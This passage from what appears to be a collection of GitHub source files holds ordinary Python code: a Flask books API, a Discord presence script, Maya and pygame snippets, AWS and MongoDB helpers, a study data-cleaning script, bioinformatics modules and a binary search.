json.dumps(heatmap_asterisk_data, sort_keys=False, separators=(',', ':'))\r\n tree_data_info = json.dumps(tree_data, sort_keys=False, separators=(',', ':'))\r\n '''\r\n with open(correction_file,\"r\") as h:\r\n a = h.readlines()\r\n row_name = a[0].strip(\"\\n\").split(\"\\t\")[1:]\r\n row_name.insert(0,\"name\")\r\n heatmap_data = dict(name='name', data=row_name, condition={'type': 'heatmap'})\r\n heatmap_data = json.dumps(heatmap_data)\r\n heatmap_asterisk_data = dict(name='name', data=row_name, condition={'type': 'heatmap_asterisk'})\r\n heatmap_asterisk_data = json.dumps(heatmap_asterisk_data)\r\n tree_data = dict(name='tree_name',condition={'type': 'tree'})\r\n tree_data = json.dumps(tree_data)\r\n self.update_db_record('sg_cor_heatmap', main_id, status=\"end\", main_id=main_id, heatmap_data=heatmap_data, heatmap_asterisk_data=heatmap_asterisk_data, tree_data=tree_data,) #column_name=column_tree_name_dict,\r\n return main_id\r\n","repo_name":"bensonlew/rnawl","sub_path":"src/mbio/api/database/tool_lab/cor_heatmap.py","file_name":"cor_heatmap.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"37588647165","text":"from pypresence import Presence\nimport time\nimport sys, os, subprocess\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--delay', type=int, default=5, help='Delay value')\nparser.add_argument('--fmt', type=str, default=\"{{artist}} - {{title}}\", help='playerctl format 
string')\nparser.add_argument('--player', type=str, default=\"firefox\", help='Player name to detect')\nparser.add_argument('--displayer', type=str, default=\"firefox\", help='Player name to show to the client')\nparser.add_argument('--icon', type=str, default=\"\", help='Icon to use. [Currently supported: kde, firefox, chromium, vlc]')\nparser.add_argument('--client', type=int, default=1142046335017685072, help='Discord client ID')\n\nargs = parser.parse_args()\ndelay = args.delay\nplayer = args.player\ndisplayer = args.displayer\nicon = args.icon\nfmt = args.fmt\nclient_id = args.client\n\nprint(f\"Connecting to discord via {client_id} / DELAY {delay} / PLAYER {player} ({displayer}) / ICON {icon} / FMT {fmt}\")\nRPC = Presence(client_id) # Initialize the client class\nRPC.connect() # Start the handshake loop\n\nlast_details = \"\"\n\nwhile True: \n details = \"\"\n \n try:\n output = subprocess.check_output([\"playerctl\", \"metadata\", \"--format\", fmt, \"-p\", player])\n details = output.decode(\"utf-8\").strip()\n except subprocess.CalledProcessError:\n details = \"No media playing\"\n \n if details != last_details:\n d = RPC.update(state=f\"Playing in {displayer}\", details=f\"{details}\", large_image=\"infinity-transparent\", large_text=\"Designed by @_technomancer\", small_image=icon, small_text=displayer, start=time.time(), buttons=[{\"label\": \"Source\", \"url\": \"https://github.com/technomancy7/synthlink\"}])\n update = d['data']\n print(f\"state update @ {update['name']}: {update['state']} / {update['details']}\")\n last_details = details\n \n time.sleep(delay)\n","repo_name":"technomancy7/synthlink","sub_path":"synthlink.py","file_name":"synthlink.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20131566759","text":"'''\n@author: etekinalp\n@date: Aug 26, 2014\n@mail: e.tekinalp@icloud.com\n@brief: This module setups a plugin\n'''\n\n\nfrom maya import cmds, mel\nfrom goe_plugins import plugin_master\nreload(plugin_master)\n\n\nclass Plug(plugin_master.PluginSetup):\n \"\"\"\n Subclass PluginSetup and setup the plugin test environment.\n \"\"\"\n\n def __init__(self, plugin, name):\n \"\"\"\n @param plugin(string): Plugin name without .so or .py suffix\n @param name(string): Name of plugin call\n \"\"\"\n\n super(Plug, self).__init__(plugin, 'so', True, True)\n\n # args\n self.plugin = plugin\n self.name = name\n\n # methods\n self._setup_plugin()\n # END __init__()\n\n def _setup_plugin(self):\n plg = cmds.createNode(self.name)\n for i in range(10):\n obja = cmds.polyCube()[0]\n objb = cmds.polySphere()[0]\n cmds.connectAttr('%s.worldMatrix' % obja,\n '%s.input[%d].inMatrix' % (plg, i))\n cmds.connectAttr('%s.output[%d].outTranslate' % (plg, i),\n '%s.t' % objb)\n cmds.connectAttr('%s.output[%d].outRotate' % (plg, i),\n '%s.r' % objb)\n #cmds.connectAttr('%s.output[0].outScale' % plg, '%s.s' % objb)\n cmds.setAttr('%s.input[%d].constraint' % (plg, i), 2)\n # END _setup_plugin()\n# END Plug()\n\nPlug(\"multiconstraint\", \"multiConstraint\")\n","repo_name":"EmreTekinalp/Public","sub_path":"src/python/tool/autorigger_v02_obsolete/__obsolete_rig_system/goe_plugins/goe_multiconstraint.py","file_name":"goe_multiconstraint.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30224277199","text":"from flask import Flask,request,jsonify\r\nimport sqlite3\r\napp = 
Flask(__name__)\r\n\r\n\r\ndef dict_factory(cursor, row):\r\n d = {}\r\n for idx, col in enumerate(cursor.description):\r\n d[col[0]] = row[idx]\r\n return d\r\n\r\n\r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n return \"An api for all the books \"\r\n\r\n\r\n@app.route('/api/v1/resources/books/all', methods=['GET'])\r\ndef api_all():\r\n conn = sqlite3.connect('books.db')\r\n conn.row_factory = dict_factory\r\n cur = conn.cursor()\r\n all_books = cur.execute('SELECT * FROM books;').fetchall()\r\n return jsonify(all_books)\r\n\r\n@app.route('/api/v1/resources/books')\r\ndef api_filter():\r\n query_parameters = request.args\r\n id = query_parameters.get('id')\r\n published = query_parameters.get('published')\r\n author = query_parameters.get('author')\r\n\r\n query = 'SELECT * FROM books WHERE '\r\n to_filter = []\r\n if id:\r\n query = query + 'id=? AND '\r\n to_filter.append(id)\r\n\r\n if published:\r\n query = query + 'published=? AND '\r\n to_filter.append(published)\r\n\r\n if author:\r\n query = query + 'author=? AND '\r\n to_filter.append(author)\r\n\r\n query = query[:-4] + ';'\r\n\r\n conn = sqlite3.connect('books.db')\r\n conn.row_factory = dict_factory\r\n cur = conn.cursor()\r\n result = cur.execute(query,to_filter).fetchall()\r\n\r\n return jsonify(result)\r\n\r\n\r\n\r\n\r\n\r\napp.run()\r\n","repo_name":"LaxmishShetty/flask_restful_books","sub_path":"api/api_final.py","file_name":"api_final.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"74872546187","text":"# Observations:\n# * The item list must be sorted;\n# * Returns the position of the item in the list;\n#\n#\n#\n# LEFT MIDDLE RIGHT\n# \\/ \\/ \\/\n# indexes: [0] [1] [2] [3] [4] [5] [6] [7] [8]\n# |--------------------------------------------|\n# values: | 20 | 23 | 25 | 28 | 35 | 36 | 40 | 41 | 42 |\n# |--------------------------------------------|\n#\n#\n# Running Time:\n# * Best-case O(1)\n# * Average O(log n)\n# * Worst-case O(log n)\n#\n\nfrom typing import List, Optional, TypeVar\n\nT = TypeVar(\"T\", int, str)\n\n\ndef binary_search_recursive(\n list_of_items: List[T], target: T, left: int, right: int\n) -> Optional[int]:\n if left >= right:\n return None\n\n middle = left + (right - left) // 2 # Position of the MIDDLE item on the list.\n\n guess = list_of_items[middle]\n if guess > target: # The guess was TOO HIGH.\n return binary_search_recursive(list_of_items, target, left, middle)\n elif guess < target: # The guess was TOO LOW.\n return binary_search_recursive(list_of_items, target, middle + 1, right)\n else: # Found the target item in the MIDDLE.\n return middle\n","repo_name":"Leonardofreua/python-algorithms-practice","sub_path":"searching/binary_search_recursive.py","file_name":"binary_search_recursive.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"1936145919","text":"import boto3\nfrom credential import *\n\ndef vpc_counts(account):\n # Set up the AWS session\n session = aws_credential(account)\n\n # Create the EC2 client\n ec2 = session.client('ec2')\n\n # Create the VPC name list\n vpc_name_list = []\n\n # Create the VPC state list\n vpc_state_list = []\n\n # Fetch the VPC list and count\n vpcs = ec2.describe_vpcs()\n vpc_count = len(vpcs['Vpcs'])\n\n # Output the VPC count and list\n for vpc in vpcs['Vpcs']:\n vpc_name_list.append(vpc['VpcId'])\n vpc_state_list.append(vpc['State'])\n\n vpc_name_list_str = \"\\n\".join([f\"{vpc_name} \" for 
vpc_name in vpc_name_list])\n vpc_state_list_str = \"\\n\".join([f\"{vpc_state} \" for vpc_state in vpc_state_list])\n\n return vpc_count, vpc_name_list_str, vpc_state_list_str","repo_name":"wjsgur8530/aws_slack_chatops","sub_path":"vpc.py","file_name":"vpc.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30693171102","text":"import os\nimport sys\nimport pymongo\nimport numpy as np\nimport pandas as pd\nfrom random import shuffle\n\n\"\"\"\nCleaning data:\n1. Filter everyone who failed attention checks\n2. Filter everyone who didn't finish the experiment(?)\n2b. Filter people who finished way too quickly?\n3. Drop nans\n4. Drop unneeded columns, rename other columns to be more standardized\n5. Create new collection with cleaned data\n\"\"\"\n\nconn = pymongo.MongoClient(\"mongodb://localhost:27017/\")\ndb = conn[\"mlve_outputs\"]\n\nexperiments = [\n 'gestalt_shapegen-depth-estimation-pilot',\n 'gestalt_shapegen-depth-estimation-split-half',\n 'gestalt_shapegen-segmentation-split-half',\n 'gestalt_shapegen-surface-normals',\n 'gestalt_shapegen-surface-normals-split-half',\n 'hypersim_surface-normals',\n 'hypersim_surface-normals-splithalf',\n 'hypersim_v2-depth-estimation-pilot',\n 'hypersim_v3-depth-estimation-split-half',\n 'hypersim_v3-segmentation-split-half',\n 'hypersim_v3-surface-normals',\n 'nsd-depth-estimation-pilot',\n 'nsd-segmentation',\n 'nsd-surface-normals',\n 'nsd_surface-normals',\n 'tdw-depth-estimation-pilot',\n 'tdw-depth-estimation-split-half',\n 'tdw-segmentation',\n 'tdw-segmentation-split-half',\n 'tdw-surface-normals-split-half',\n 'tdw_surface-normals']\n\ndepth_experiments = [\n'tdw-depth-estimation-split-half',\n'tdw-depth-estimation-pilot',\n'hypersim_v2-depth-estimation-pilot',\n'hypersim_v3-depth-estimation-split-half',\n'nsd-depth-estimation-pilot',\n'gestalt_shapegen-depth-estimation-pilot',\n'gestalt_shapegen-depth-estimation-split-half',\n]\n\nsegmentation_experiments = [\n'hypersim_v3-segmentation-split-half',\n'nsd-segmentation',\n'gestalt_shapegen-segmentation-split-half',\n'tdw-segmentation',\n'tdw-segmentation-split-half',\n]\n\nsurface_normals_experiments = [\n'nsd_surface-normals',\n'nsd-surface-normals',\n'hypersim_surface-normals-splithalf',\n'hypersim_surface-normals',\n'hypersim_v3-surface-normals',\n'tdw_surface-normals',\n'tdw-surface-normals-split-half',\n'gestalt_shapegen-surface-normals-split-half',\n'gestalt_shapegen-surface-normals',\n]\n\n\"\"\"\nTODO: \n- For each experiment, filter out people who failed attention checks\n- For each experiment, filter out people who didn't finish?\n- Filter people who finished way too quickly?\n- For each experiment, drop nans\n- Drop irrelevant columns (ie; keep userID, metadata, gt if exists, response, response time?, probe locations, batchID?)\n- Combine nsd-surface-normals experiments\n- Aggregate results for split halfs and pilots / large scale experiments\n- Store in csvs\n- Write to mongo?\n\"\"\"\n\ndef load_experiment(exp_name):\n col = db[exp_name]\n records = []\n count = 0\n for record in col.find({}):\n records.append(record)\n count += 1\n \n print(f\"Returning {count} records for {exp_name}\")\n df = pd.DataFrame(records)\n return df\n\ndef unit_vector(vector):\n \"\"\" Returns the unit vector of the vector. 
\"\"\"\n return vector / np.linalg.norm(vector)\n\ndef angular_dist(v1, v2, use_degrees=True):\n \"\"\" Returns the angle in radians between vectors 'v1' and 'v2':\n \"\"\"\n if v1 == [] or v2 == [] or v1 == None or v2 == None or \\\n (type(v1) == list and len(v1) > 0 and (v1[0] == None or np.isnan(v1[0]))) or \\\n (type(v2) == list and len(v2) > 0 and (v2[0] == None or np.isnan(v2[0]))):\n return None\n\n v1_u = unit_vector(v1)\n v2_u = unit_vector(v2)\n radians = np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))\n degrees = np.degrees(radians)\n if np.any(np.isnan(degrees)):\n return None\n \n if not use_degrees:\n return radians\n else:\n return degrees\n\ndef filter_attention_checks(df, experiment_type):\n attention_key = [x for x in df.columns if \"attention\" in x.lower()][0] \n attention_checks = df[df[attention_key] == True]\n if len(attention_checks.isna().sum()) > len(attention_checks) / 4:\n return df\n\n drop_ids = []\n if experiment_type == \"surface-normals\":\n attention_checks[\"angular_error\"] = attention_checks.apply(lambda x: angular_dist(x[\"indicatorFinalDirection\"], x[\"trueArrowDirection\"]), axis=1)\n for user, att_trials in attention_checks.groupby(\"userID\"):\n if att_trials[\"angular_error\"].mean() > 60:\n drop_ids.append(user)\n \n elif experiment_type == \"depth\":\n for user, att_trials in attention_checks.groupby(\"userID\"):\n if att_trials[\"correct\"].mean() < 0.5:\n drop_ids.append(user)\n\n elif experiment_type == \"segmentation\":\n if \"segmentation_correct\" in df.columns:\n correct_key = \"segmentation_correct\"\n else:\n correct_key = \"correct\"\n for user, att_trials in attention_checks.groupby(\"userID\"):\n if att_trials[correct_key].mean() < 0.5:\n drop_ids.append(user)\n\n df = df.drop(attention_checks.index)\n df = df[~df[\"userID\"].isin(drop_ids)]\n return df\n\ndef filter_incomplete(df):\n incomplete = []\n # count max number of times a specific user ID has shown up\n total_trials = int(df[\"userID\"].value_counts().median())\n for user, trials in df.groupby(\"userID\"):\n if len(trials) < total_trials:\n incomplete.append(user)\n\n df = df[~df[\"userID\"].isin(incomplete)]\n return df\n\ndef filter_by_time(df):\n if df[\"time_elapsed\"].isna().sum() > len(df) / 4:\n # If more than 25% of response times are missing, don't filter\n return df\n too_fast = []\n mean_response_time = df.groupby(\"userID\")[\"time_elapsed\"].max().mean() # mean response time for whole experiment\n response_time_std = df.groupby(\"userID\")[\"time_elapsed\"].max().std() \n for user, trials in df.groupby(\"userID\"):\n if trials[\"time_elapsed\"].max() < mean_response_time - response_time_std or \\\n trials[\"time_elapsed\"].max() > mean_response_time + (response_time_std * 2):\n too_fast.append(user)\n \n df = df[~df[\"userID\"].isin(too_fast)]\n return df\n\ndef drop_duplicates(df):\n is_duplicate = [x for x in df.columns if \"duplicate\" in x.lower()][0]\n df = df[df[is_duplicate] == False]\n return df\n\ndef obscure_ids(df):\n def shuffle(x):\n x = list(x)\n np.random.shuffle(x)\n return ''.join(x)\n shuffled = {}\n for userID in df[\"userID\"].unique():\n shuffled[userID] = shuffle(userID)\n \n df[\"ID\"] = df[\"userID\"].apply(lambda x: shuffled[x])\n\n return df\n\ndef filter_cols(df, experiment_type):\n \"\"\"\n Obscures IDs, standardizes naming schemes for columns, and drops irrelevant columns\n \"\"\"\n df = obscure_ids(df)\n \n # Rename columns\n batch_key = [x for x in df.columns if \"batch\" in x.lower()][0]\n meta_key = [x for x in df.columns if 
\"meta\" in x.lower()][0]\n if experiment_type == \"surface-normals\":\n angular_error = df.apply(lambda x: angular_dist(x[\"indicatorFinalDirection\"], x[\"trueArrowDirection\"]), axis=1)\n df[\"score\"] = angular_error\n df = df.drop(columns=[\"response\"])\n\n rename = {\"indicatorFinalDirection\": \"response\", \n \"trueArrowDirection\": \"gt\", \n \"arrowPixelPosition\": \"probeLocation\",\n batch_key: \"batchID\", \n meta_key: \"metadata\",\n }\n df.rename(columns=rename, inplace=True)\n\n elif experiment_type == \"segmentation\":\n if \"segmentation_correct\" in df.columns:\n correct_key = \"segmentation_correct\"\n response_key = \"segmentation_response\"\n df = df.drop(columns=[\"response\"])\n else:\n correct_key = \"correct\"\n response_key = \"response\"\n rename = {correct_key: \"score\", \n \"sameObj\": \"gt\", \n response_key: \"response\",\n batch_key: \"batchID\",\n meta_key: \"metadata\", \n \"probe_locations\": \"probeLocation\"\n }\n df = df.rename(columns=rename)\n \n elif experiment_type == \"depth\":\n if \"depth_correct\" in df.columns:\n correct_key = \"depth_correct\"\n response_key = \"depth_response\"\n df = df.drop(columns=[\"response\"])\n else:\n correct_key = \"correct\"\n response_key = \"response\" \n rename = {correct_key: \"score\", \n \"gtDepths\": \"gt\", \n response_key: \"response\",\n batch_key: \"batchID\",\n meta_key: \"metadata\", \n \"probe_locations\": \"probeLocation\"\n }\n df = df.rename(columns=rename)\n if not \"gt\" in df.columns:\n df[\"gt\"] = None\n df[\"score\"] = None\n\n # Drop irrelevant columns \n # ID: Obscured user ID, imageURL: url, gt: ground truth if exists, response: user response, score: correctness score, batchID: batch ID\n df = df[[\"ID\", \"imageURL\", \"gt\", \"response\", \"score\", \"probeLocation\", \"batchID\", \"expName\", \"iterationName\"]]\n # Drop rows where response is NaN\n df = df.dropna(subset=[\"response\"])\n print(df.info())\n\n return df\n\ndef filter_df(df, experiment_type):\n print(\"Total records: \", len(df))\n # Filter anyone who failed attention checks\n df = filter_attention_checks(df, experiment_type)\n print(\"After filtering attention check fails: \", len(df))\n # Filter people who didn't complete experiment\n df = filter_incomplete(df)\n print(\"After filtering incomplete: \", len(df))\n # Filter people who finished too fast or slow\n df = filter_by_time(df)\n print(\"After filtering by time: \", len(df))\n # Drop duplicate trials (for intra-user reliability)\n df = drop_duplicates(df)\n print(\"After dropping duplicates: \", len(df))\n # Standardize column names, obscure IDs, and drop irrelevant columns and NaN rows\n df = filter_cols(df, experiment_type)\n df[\"experiment_type\"] = experiment_type\n \n return df\n \ndef get_experiment_type(experiment):\n if \"normal\" in experiment:\n return \"surface-normals\"\n elif \"segmentation\" in experiment:\n return \"segmentation\"\n elif \"depth\" in experiment:\n return \"depth\"\n\ncleaned_db = conn[\"mlve_results\"]\ncleaned_db.drop_collection(\"results\")\ncleaned_col = cleaned_db[\"results\"]\n\ntotal_records = 0\nfor experiment in experiments:\n print(\"*\"*80 + \"\\n\" + f\"\\t\\Processing Experiment: {experiment}\\n\" + \"*\"*80)\n exp_col = db[experiment]\n df = load_experiment(experiment)\n\n experiment_type = get_experiment_type(experiment)\n df = filter_df(df, experiment_type)\n total_records += len(df)\n print(\"=\"*80 + \"\\n\" + f\"\\t\\tExperiment: {experiment}:\\n\\t\\tTotal records: {len(df)}\\n\" + \"=\"*80)\n\n 
cleaned_col.insert_many(df.to_dict(\"records\"))\n \nprint(\"Total records: \", total_records)","repo_name":"yifr/mlve","sub_path":"results/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":10666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21250864993","text":"import pygame \n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, position, rotation, image):\n super().__init__()\n self.image = image \n self.position = position\n self.rect = pygame.rect.Rect(0, 0, self.image.get_width(), self.image.get_height())\n self.speed = 4\n self.rotation = rotation\n ","repo_name":"Oyvindyt/oblig3-inf1400","sub_path":"1400-Oblig-3/BulletClass.py","file_name":"BulletClass.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"5560371983","text":"\nimport torch\nimport torch.nn as nn\n\n\n #Hessian products\n\nlinear = nn.Linear(10, 20)\nx = torch.randn(1, 10)\ny = linear(x).sum()\n\ngrad = torch.autograd.grad(y, linear.parameters(), create_graph=True)\n\nv = grad[0].clone().requires_grad_(True)\n\nz = grad[0] @ v.t()\n\nz.mean().backward()\nprint(linear.weight.grad)\nprint(z.grad_fn)\nprint(z.grad_fn.next_functions)\nprint(z.grad_fn.next_functions[1][0].next_functions)\nprint(z.grad_fn.next_functions[1][0].next_functions[0][0].next_functions)\n'''\n\n((None, 0), (, 0))\n((, 0),)\n'''\n\n","repo_name":"mrluin/Pytorch-Forums-Code-Snippet","sub_path":"Hessian_products.py","file_name":"Hessian_products.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"30886087315","text":"from datetime import datetime\nfrom typing import Dict\n\nfrom logx.common.common_object import (\n CustomDate, Multiple, DatabaseResult, Result, Customer\n)\nfrom .settings_handler import DatabaseSettings\nfrom logx.common.algo import update_process\n\nfrom pymongo import MongoClient\nfrom rich.table import Table\nfrom rich.console import Console\nfrom rich.text import Text\nfrom rich import box\n\nimport dns\n\n\n# Current DNS fix\ndns.resolver.default_resolver=dns.resolver.Resolver(configure=False)\ndns.resolver.default_resolver.nameservers=['8.8.8.8']\n\n\nclass Database:\n\n def __init__(self) -> None:\n self.settings = DatabaseSettings()\n\n if not self.settings.srv:\n client = MongoClient(\n host = self.settings.host,\n port = self.settings.port,\n username = self.settings.user,\n password = self.settings.passw,\n authSource = self.settings.database\n )\n else:\n client = MongoClient(self.settings.host)\n\n self.db = client[self.settings.database]\n self.main = self.settings.record_collection_name\n self.test = self.settings.dev_collection_name\n self.history = self.settings.history_collection_name\n self.history_test = \"modified_test\"\n\n def get(self, date: str | CustomDate | list[str], test: bool = False, **kwargs) -> DatabaseResult | bool:\n \"\"\"\n Optional:\n c: Collection Names\n show_table: bool (Default to False) Display result as a table\n \"\"\"\n\n show_table = kwargs.get(\"show_table\", False)\n\n def internal_func(date: str | CustomDate) -> Multiple | dict[None, None]:\n if type(date) == str:\n date = CustomDate(date)\n\n collection = self.db[kwargs.get(\"c\", self.main)] if not test else self.db[self.test]\n result = collection.find_one(\n {\n 'day' : date.result['data'][0],\n 'month' : date.result['data'][1],\n 
'year' : date.result['data'][2]\n }\n )\n\n if result:\n m = Multiple()\n m.repack(result)\n\n return m\n else:\n return {}\n\n def display(m: Multiple) -> None:\n table = Table(show_footer=True, box=box.SIMPLE_HEAD)\n console = Console()\n\n table.add_column(\"No\")\n table.add_column(\"Name\", overflow=\"crop\")\n table.add_column(\"Transaction\", footer=Text(m.total_idr, justify=\"center\"))\n table.add_column(\"Transfer\")\n table.add_column(\"Diff\")\n table.add_column(\"Note\")\n\n for num, items in enumerate(m.records):\n table.add_row(str(num + 1), items.cname, items.trx_idr, items.trf_idr, items.diff_idr, items.note)\n\n console.print(table, justify=\"center\")\n\n a_result = []\n if type(date) == list:\n for i in date:\n res = internal_func(i) if internal_func(i) else {}\n\n if show_table and res:\n display(res)\n elif not res:\n a_result.append(f\"{CustomDate(i).result['display']} not found!\")\n else:\n a_result.append(res)\n else:\n res = internal_func(date) if internal_func(date) else {}\n\n if show_table and res:\n display(res)\n elif not res:\n return DatabaseResult(Result.S_NFOUND, {})\n else:\n return DatabaseResult(Result.S_SUCCESS, res)\n\n if not show_table:\n return DatabaseResult(Result.S_SUCCESS, a_result)\n\n def get_all(self, test: bool = False) -> DatabaseResult:\n collection = self.db[self.main] if not test else self.db[self.test]\n holder = []\n\n result = collection.find()\n for i in result:\n res = Multiple()\n res.repack(i)\n\n if res.records:\n holder.append(res)\n\n return DatabaseResult(Result.S_SUCCESS, holder)\n\n def save(self, data: Multiple, test: bool = False) -> DatabaseResult:\n if not data:\n return DatabaseResult(Result.E_VAR, False)\n\n if self.get(data._date, test).C_RESULT == Result.S_SUCCESS:\n return DatabaseResult(Result.S_EXISTS, False)\n\n collection = self.db[self.main] if not test else self.db[self.test]\n result = collection.insert_one(data.unpack())\n\n return DatabaseResult(Result.S_SUCCESS, result.acknowledged)\n\n def update(self, data: Multiple, test: bool = False) -> DatabaseResult:\n\n r = self.get(data._date, test)\n if r.C_RESULT == Result.S_SUCCESS:\n history = self.db[self.history] if not test else self.db[self.history_test]\n collection = self.db[self.main] if not test else self.db[self.test]\n\n old_data = r.VALUE.unpack()\n unpacked_data = data.unpack()\n\n old_data['modified_at'] = datetime.today()\n changed = update_process(r.VALUE, data)\n\n old_data['data'] = changed['data']\n old_data['update_mode'] = changed['operation']\n del old_data['total']\n\n print(old_data)\n\n history.insert_one(old_data)\n result = collection.update_one({\n 'day': unpacked_data['day'],\n 'month': unpacked_data['month'],\n 'year': unpacked_data['year']\n }, { '$set': {\n 'data': unpacked_data['data'],\n 'total': unpacked_data['total'],\n 'note': unpacked_data['note'],\n 'modified_date': datetime.today()\n }})\n\n return DatabaseResult(Result.S_SUCCESS, result.acknowledged)\n else:\n return DatabaseResult(Result.S_NFOUND, False)\n\n def delete(self, date: str | CustomDate, test: bool = False) -> DatabaseResult:\n\n r = self.get(date, test)\n if r.C_RESULT == Result.S_SUCCESS:\n collection = self.db[self.main] if not test else self.db[self.test]\n unpacked_data = r.VALUE.unpack()\n\n result = collection.delete_one({\n 'day': unpacked_data['day'],\n 'month': unpacked_data['month'],\n 'year': unpacked_data['year']\n })\n\n if result.acknowledged:\n rs = self.get(date, c=\"history\")\n if rs.C_RESULT == Result.S_SUCCESS:\n c_rs = 
self.db[\"history\"]\n c_rs.delete_many({\n 'day': unpacked_data['day'],\n 'month': unpacked_data['month'],\n 'year': unpacked_data['year']\n })\n\n return DatabaseResult(Result.S_SUCCESS, result.acknowledged)\n else:\n return DatabaseResult(Result.S_NFOUND, False)\n\n\n def get_customers_list(self) -> DatabaseResult:\n\n collection = self.db['customer']\n c_list = {}\n\n for items in collection.find():\n cs = Customer(items['name'], items['total'])\n cs.id = items['_id']\n c_list[items['name']] = cs\n\n return DatabaseResult(Result.S_SUCCESS, c_list)\n","repo_name":"anfaro/logx","sub_path":"logx/data/database_handler.py","file_name":"database_handler.py","file_ext":"py","file_size_in_byte":7320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40586124925","text":"# -*- coding: utf-8 -*-\n# __author__ = 'haidong.gu'\n# __modify__ = '2019/4/11'\n\nimport os\nimport shutil\nimport gevent\nfrom biocluster.core.exceptions import OptionError\nfrom biocluster.module import Module\nfrom mbio.packages.metagenomic.common import link_file, link_dir\n\n\nclass ExtractReadsModule(Module):\n \"\"\"\n 抽取一定乘数的reads\n \"\"\"\n\n def __init__(self, work_id):\n super(ExtractReadsModule, self).__init__(work_id)\n option = [\n {\"name\": \"fastq_dir\", \"type\": \"infile\", \"format\": \"sequence.fastq_dir\"},\n {\"name\": \"fastq_list\", \"type\": \"infile\", \"format\": \"bacgenome.simple_file\"}, # list表,第一列为fastq前缀,第二列为碱基数(单位bp), 第三列为基因组大小(单位兆)\n {\"name\": \"depth_ctrl\", \"type\": \"bool\", \"default\": True}, # 是否需要做数据抽取\n {\"name\": \"depth_num\", \"type\": \"int\", \"default\": 150, \"min\": 10} # 抽取数据的乘数\n ]\n self.add_option(option)\n self.run_tools = []\n\n def check_options(self):\n \"\"\"\n 检查参数\n :return:\n \"\"\"\n # edit options check\n return True\n\n def run(self):\n super(ExtractReadsModule, self).run()\n self.run_check()\n\n def run_check(self):\n with open(self.option(\"fastq_list\").prop[\"path\"]) as file:\n lines = file.readlines()[1:]\n for line in lines:\n line = line.strip().split(\"\\t\")\n prefix, base, gsize = line\n self.logger.info(prefix)\n if self.option(\"depth_ctrl\"):\n self.check_then_run_extract(prefix, base, gsize)\n else:\n self.logger.info(\"direct put output\")\n self.direct_put_output(prefix)\n if len(self.run_tools) > 0:\n self.on_rely(self.run_tools, self.set_output)\n for tool in self.run_tools:\n tool.run()\n else:\n gevent.spawn_later(5, self.end)\n\n def check_then_run_extract(self, prefix, base, gsize):\n gsize_in_bp = float(gsize) * 1204*1204\n if float(base) / gsize_in_bp > self.option(\"depth_num\"):\n scale = self.option(\"depth_num\") * gsize_in_bp / float(base)\n self.logger.info(scale)\n self.run_seqtk(prefix, scale)\n else:\n self.direct_put_output(prefix)\n\n def run_seqtk(self, prefix, scale):\n file1 = prefix + \".clean.1.fq\"\n file2 = prefix + \".clean.2.fq\"\n tool = self.add_tool(\"bacgenome.seqtk\")\n tool.set_options({\n \"fastq\": os.path.join(self.option(\"fastq_dir\").prop[\"path\"], file1),\n \"outfastq\": file1,\n \"scale\": scale\n })\n self.run_tools.append(tool)\n tool2 = self.add_tool(\"bacgenome.seqtk\")\n tool2.set_options({\n \"fastq\": os.path.join(self.option(\"fastq_dir\").prop[\"path\"], file2),\n \"outfastq\": file2,\n \"scale\": scale\n })\n self.run_tools.append(tool2)\n\n def direct_put_output(self, prefix):\n file1 = prefix + \".clean.1.fq\"\n file2 = prefix + \".clean.2.fq\"\n link_file(os.path.join(self.option(\"fastq_dir\").prop[\"path\"], file1), 
os.path.join(self.output_dir, file1))\n link_file(os.path.join(self.option(\"fastq_dir\").prop[\"path\"], file2), os.path.join(self.output_dir, file2))\n\n def set_output(self):\n \"\"\"\n 将结果文件连接到output文件夹下面\n :return:\n \"\"\"\n self.logger.info(\"设置结果目录\")\n for tool in self.run_tools:\n link_dir(tool.output_dir, self.output_dir)\n self.logger.info(\"设置seqtk结果成功\")\n self.end()\n\n def end(self):\n result_dir = self.add_upload_dir(self.output_dir)\n result_dir.add_relpath_rules([\n [\",\", \"\", \"结果输出目录\"],\n ])\n result_dir.add_regexp_rules([\n [\"\", \"\", \"\"]\n ])\n super(ExtractReadsModule, self).end()\n","repo_name":"bensonlew/rnawl","sub_path":"src/mbio/modules/bacgenome/extract_reads.py","file_name":"extract_reads.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"33239837224","text":"\"\"\"Day 7: Handy Haversacks\"\"\"\nimport logging\nimport time\nfrom typing import Dict, List\n\nimport coloredlogs\n\nfrom src import DATA_PATH\n\nlog_fmt = \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\nlogging.basicConfig(level=logging.INFO, format=log_fmt)\nlogger = logging.getLogger(__file__)\ncoloredlogs.install()\n\n\ndef load_day_7() -> List[str]:\n filename = DATA_PATH / \"day7\"\n with open(filename, \"r\") as file:\n return [line.strip() for line in file.readlines()]\n\n\ndef bag_contents(rules, 